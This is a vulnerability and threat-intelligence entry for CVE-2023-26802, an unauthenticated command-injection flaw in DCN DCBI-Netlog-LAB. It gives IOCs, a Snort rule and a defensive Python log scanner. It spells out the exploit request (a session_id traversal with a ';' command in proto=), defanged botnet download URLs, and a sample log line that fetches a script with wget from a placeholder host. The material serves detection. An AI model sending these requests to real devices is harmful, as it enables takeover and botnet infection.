CVE-2023-26802
published 2023-03-26


Priority: P1 (89)
Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Flags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 48.71% (98.7th percentile)
An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.

Affected (1 range)

Vendor: dcnglobal
Product: dcbi-netlog-lab_firmware
Version range: (none listed)
Fixed in: (none listed)

Detection & IOCs (extracted from sources)

path: /network_config/nsg_masq.cgi
url: GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/{{file_name}};
path: /usr/local/lyx/lyxcenter/web/
ip: 163.123.143.126
url: hxxp://163.123.143[.]126/bins/dark.x86
url: hxxp://163.123.143[.]126/bins/dark.mips
url: hxxp://163.123.143[.]126/bins/dark.mpsl
url: hxxp://163.123.143[.]126/bins/dark.arm4
url: hxxp://163.123.143[.]126/bins/dark.arm5
url: hxxp://163.123.143[.]126/bins/dark.arm6
url: hxxp://163.123.143[.]126/bins/dark.arm7
url: hxxp://163.123.143[.]126/bins/dark.ppc
url: hxxp://163.123.143[.]126/bins/dark.m68k
url: hxxp://163.123.143[.]126/bins/dark.sh4
url: hxxp://163.123.143[.]126/bins/dark.86_64
url: hxxp://2.56.59[.]215/i.sh
url: hxxp://212.192.241[.]72/lolol.sh
ip: 2.56.59.215
ip: 195.133.40.141
url: hxxp://31.210.20[.]100/lolol[.]sh
url: hxxp://212.192.241[.]72/lolol[.]sh
url: hxxp://212.192.241[.]87/bins/
domain: dotheneedfull[.]club
ip: 193.47.61.75
filename: lb.sh
Snort rule:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT DCN DCBI-Netlog-LAB Remote Code Execution Vulnerability Attempt (CVE-2023-26802)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/network_config/nsg_masq.cgi?"; startswith; fast_pattern; content:"&proto="; distance:0; pcre:"/(?:(wget|curl))/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-iz1h9; reference:cve,2023-26802; classtype:attempted-admin; sid:2048549; rev:1; metadata:attack_target IoT, created_at 2023_10_12, cve CVE_2023_26802, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_10_12, reviewed_at 2023_10_12, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit requests target GET /cgi-bin/network_config/nsg_masq.cgi with the 'proto' parameter used for command injection (semicolon-delimited OS commands). The Snort/ET rule keys on the URI prefix '/cgi-bin/network_config/nsg_masq.cgi?' combined with '&proto=' followed by wget or curl later in the URI.
  • The session_id parameter is set to '../' (path traversal) to bypass authentication in the exploit request.
  • Post-exploitation, the malware writes output files to /usr/local/lyx/lyxcenter/web/ and retrieves them via HTTP. Detect unexpected .html files appearing in that web root.
  • Verify exploitation by checking the HTTP response body for the strings 'nsg_bridge.cgi' and 'nsg_dhcpactiveip.cgi', which indicate that directory-listing output was written to the web root.
  • IZ1H9 botnet clients use the XOR key 0xBAADF00D for configuration string decryption (bytewise: 0xBA^0xAD^0xF0^0x0D = 0xEA). Scan memory or binaries for this key to identify IZ1H9 samples.
  • IZ1H9 uses a 1-byte XOR key 0x54 to encrypt embedded telnet/SSH brute-force credentials. Scan botnet binaries for this decryption pattern.
  • Palo Alto Networks Threat Prevention signatures 93386, 93718, 93721 and 93722 cover the exploit traffic and malware associated with this campaign.
  • The IZ1H9 exploit function for the Tenda vulnerability mistakenly executes 'netlog.sh' instead of 'tenda.sh', so that specific exploit chain does not function correctly as coded in this sample.
  • The shell script downloader hash (692a5d099e37cd94923ea2) appears truncated in the source document and may be incomplete; verify it against the original report before using it as a detection hash.
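The following is an added example, not code from this database or from the Emerging Threats rule above. It re-implements the rule's logic as a log-scanning function for a defender who has web-server access logs rather than inline IDS: it flags GET requests whose URI starts with /cgi-bin/network_config/nsg_masq.cgi?, carry &proto=, and have wget or curl after that parameter (the rule's relative pcre), and it separately flags the session_id=../ traversal and shell metacharacters in proto= noted in the bullets. The log line format, the function names and the sample lines are constructed for this example; adjust parse_request_line to your own access-log layout.

```python
import re
from urllib.parse import unquote

# Constants taken from the ET rule above (URI prefix, parameter name, downloader names).
TARGET_PREFIX = "/cgi-bin/network_config/nsg_masq.cgi?"
PROTO_MARKER = "&proto="
DOWNLOADER_RE = re.compile(r"(wget|curl)")
SHELL_METACHARS = ";|`$"

# Constructed sample access log (hypothetical format: client_ip "METHOD URI HTTP/x" status).
# Line 1: a normal request to another CGI; line 2: the CVE-2023-26802 exploit pattern
# with a placeholder TEST-NET host; line 3: a benign request to the vulnerable CGI.
SAMPLE_LOG = """\
10.0.0.5 "GET /cgi-bin/network_config/nsg_bridge.cgi?user_name=admin&session_id=abc123&lang=zh_CN.UTF-8&act=1 HTTP/1.1" 200
192.0.2.10 "GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;wget%20http://192.0.2.99/x.sh; HTTP/1.1" 200
192.0.2.11 "GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=deadbeef&lang=zh_CN.UTF-8&act=2&proto=tcp HTTP/1.1" 200
"""

LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+) HTTP/[\d.]+"')


def parse_request_line(line):
    """Split one constructed log line into (client_ip, method, uri); None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return m.group(1), m.group(2), m.group(3)


def parse_query(uri):
    """Parse the query string into {name: [values]} without splitting on ';',
    so an injected ';cmd' stays inside the proto value where we want to see it."""
    query = uri.partition("?")[2]
    params = {}
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def classify_request(method, uri):
    """Return the list of findings for one request (empty list if nothing suspicious)."""
    findings = []
    if method != "GET" or not uri.startswith(TARGET_PREFIX):
        return findings
    # Same logic as the ET rule: '&proto=' must appear, and wget/curl must follow it.
    idx = uri.find(PROTO_MARKER)
    if idx != -1 and DOWNLOADER_RE.search(uri, idx):
        findings.append("rule-match: nsg_masq.cgi proto= followed by wget/curl (CVE-2023-26802)")
    params = parse_query(uri)
    if any("../" in v for v in params.get("session_id", [])):
        findings.append("auth-bypass: session_id contains ../")
    proto = params.get("proto", [""])[0]
    if any(c in proto for c in SHELL_METACHARS):
        findings.append("injection: shell metacharacter in proto=")
    return findings


def scan_log(text):
    """Scan a log body and return [(client_ip, findings)] for every flagged request."""
    hits = []
    for line in text.splitlines():
        parsed = parse_request_line(line)
        if parsed is None:
            continue
        ip, method, uri = parsed
        findings = classify_request(method, uri)
        if findings:
            hits.append((ip, findings))
    return hits


if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG):
        print(ip)
        for f in findings:
            print("  -", f)
```

The third sample line shows why the rule requires wget/curl after &proto=: a legitimate value such as proto=tcp on the same CGI produces no finding, while the traversal and metacharacter checks catch variants that fetch nothing over HTTP and would slip past the ET rule alone.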

CVSS provenance

NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.8 CRITICAL